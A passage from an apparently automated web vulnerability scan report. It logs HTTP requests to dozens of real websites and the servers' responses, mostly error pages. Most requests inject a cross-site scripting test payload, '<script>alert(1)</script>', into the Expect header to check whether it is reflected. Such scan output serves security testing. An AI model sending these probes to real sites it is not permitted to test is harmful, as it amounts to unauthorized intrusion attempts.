Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Server: WP7a
Date: Sun, 01 May 2011 23:44:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.45. http://www.hairyfilm.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hairyfilm.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hairyfilm.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Sun, 01 May 2011 23:45:12 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>
33.46. http://www.hairygirlspussies.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hairygirlspussies.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hairygirlspussies.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Sun, 01 May 2011 23:47:27 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>
33.47. http://www.hsj.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hsj.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hsj.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:29:49 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.48. http://www.ibegin.com/weather/weather_widget.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:42:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 773


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line
...[SNIP]...
33.49. http://www.inmates-searches.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inmates-searches.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inmates-searches.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:29:00 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.50. http://www.insites.eu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.insites.eu
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.insites.eu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:53:05 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.51. http://www.japanator.com/elephant/index_cblogs-mini.phtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/index_cblogs-mini.phtml

Request

GET /elephant/index_cblogs-mini.phtml?y=community&cblogs=1 HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:56:27 GMT
Server: lighttpd/1.4.28
Content-Length: 7359


   <html>
<body leftmargin=10 topmargin=10>

<div class="post-mini-cblogs" style="font-size:11px; font-family:arial; display:block;">
       <span class="post-avatar">
       <a href="profile.phtml?u=Rewarp" tar
...[SNIP]...
33.52. http://www.japanator.com/elephant/login.phtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Request

GET /elephant/login.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:55:17 GMT
Server: lighttpd/1.4.28
Content-Length: 47739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login | Japan
...[SNIP]...
33.53. http://www.japanator.com/elephant/signup.phtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Request

GET /elephant/signup.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:06:57 GMT
Server: lighttpd/1.4.28
Content-Length: 46289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Signup for an
...[SNIP]...
33.54. http://www.kieronwilliamson.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kieronwilliamson.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kieronwilliamson.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1116
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:17:56 GMT

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at &#119;&#101;&#98;&#45;&#100
...[SNIP]...
33.55. http://www.laptoptracking.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.laptoptracking.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.laptoptracking.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 02 May 2011 00:05:02 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 187

<html>
<head>
<title>Error</title>
</head>
<body>
<div>
<h3>Please try again later. Thank you.</h3>
</div>
</body>
</html>
33.56. http://www.laterooms.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.laterooms.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.laterooms.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE8
Date: Mon, 02 May 2011 00:28:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.57. http://www.leagle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.leagle.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.leagle.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 00:53:28 GMT
Content-Length: 75

The page cannot be displayed because an internal server error has occurred.
33.58. http://www.lee.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lee.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lee.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: WWW
Content-Type: text/html
Date: Mon, 02 May 2011 00:19:23 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
Real-Hostname: lee.net
Content-Length: 680
Connection: Keep-Alive
X-Cache-Info: cached

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...
33.59. http://www.mecum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mecum.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mecum.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 00:04:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.60. http://www.myfavoritegames.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfavoritegames.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myfavoritegames.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
P3P: CP="NID DSP CAO COR"
Date: Sun, 01 May 2011 23:31:53 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.61. http://www.mylearningplan.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylearningplan.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylearningplan.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 492
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=%7BB37083AE%2D04D4%2D461A%2DB2D9%2D387A5E72C198%7D; domain=.mylearningplan.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:53:09 GMT

<div id='section_D'>
           <h1><b>Error Message</b></h1>
<div class='alert'>
<p></p>
<p></p>
<p align='center'><strong>Error: An Error Has occurred on this page</strong></p>
<p></p>
<p align='cent
...[SNIP]...
33.62. http://www.myrtlebeach-resorts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myrtlebeach-resorts.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myrtlebeach-resorts.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:48:47 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>
33.63. http://www.nfcc.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nfcc.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nfcc.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:18:11 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.64. http://www.noonetube.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.noonetube.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.noonetube.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sun, 01 May 2011 23:58:31 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.65</center>
</body>
</html>
33.65. http://www.nylaarp.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nylaarp.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nylaarp.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:33:19 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.66. http://www.onlinemicrofiche.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinemicrofiche.com
Path:   /

Request

GET / HTTP/1.1
Host: www.onlinemicrofiche.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:04:13 GMT
Connection: close
Content-Type: text/html
Content-Length: 172

<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
33.67. http://www.onlinemoneystash.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinemoneystash.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.onlinemoneystash.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

33.68. http://www.oshkosh365.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oshkosh365.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oshkosh365.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:36:09 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwebservers-http-pool=1191252140.20480.0000; path=/

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>
33.69. http://www.phonedelivery4g.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phonedelivery4g.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.phonedelivery4g.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 02 May 2011 00:00:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 187

<html>
<head>
<title>Error</title>
</head>
<body>
<div>
<h3>Please try again later. Thank you.</h3>
</div>
</body>
</html>
33.70. http://www.picindividuals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.picindividuals.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.picindividuals.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:51:26 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.71. http://www.recon.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.recon.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.recon.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
WS: 5
Date: Sun, 01 May 2011 23:33:59 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.72. http://www.redirectgame.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redirectgame.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.redirectgame.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:11:40 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.73. http://www.right-ads.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.right-ads.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.right-ads.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.39
Date: Mon, 02 May 2011 00:04:47 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.6.39</center>
</body>
</html>
33.74. http://www.righttoworkfoundation.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.righttoworkfoundation.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.righttoworkfoundation.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:11:08 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>
33.75. http://www.ronniesmailorder.com/fiche_select1.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ronniesmailorder.com
Path:   /fiche_select1.asp

Request

GET /fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki HTTP/1.1
Host: www.ronniesmailorder.com
Proxy-Connection: keep-alive
Referer: http://www.ronniesmailorder.com/fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0

Response

HTTP/1.1 200 OK
Cache-Control: Private
Date: Mon, 02 May 2011 02:06:17 GMT
Pragma: no-store
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0; path=/
Vary: Accept-Encoding
Content-Length: 483234

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<SCRIPT src="http://www.psnnewsletter.com/psnpopup.js" LANGUAGE="JavaScript"></SCRIPT>
<script src="http://www.powersportsnetwork.com/f
...[SNIP]...
33.76. http://www.ronniesmailorder.com/testimonials_display.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ronniesmailorder.com
Path:   /testimonials_display.asp

Request

GET /testimonials_display.asp HTTP/1.1
Host: www.ronniesmailorder.com
Proxy-Connection: keep-alive
Referer: http://www.ronniesmailorder.com/fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0; __utmz=228257950.1304319978.1.1.utmcsr=ronnies.com|utmccn=(referral)|utmcmd=referral|utmcct=/micro.htm; __utma=228257950.337968248.1304319978.1304319978.1304319978.1; __utmc=228257950; __utmb=228257950.1.10.1304319978

Response

HTTP/1.1 200 OK
Cache-Control: Private
Date: Mon, 02 May 2011 02:07:08 GMT
Pragma: no-store
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10

<!--T:0-->
33.77. http://www.rustoleum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rustoleum.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rustoleum.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:30:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.78. http://www.snapfinger.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snapfinger.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.snapfinger.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:55:37 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.79. http://www.str8boyzseduced.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.str8boyzseduced.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.str8boyzseduced.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Sun, 01 May 2011 23:35:30 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.64</center>
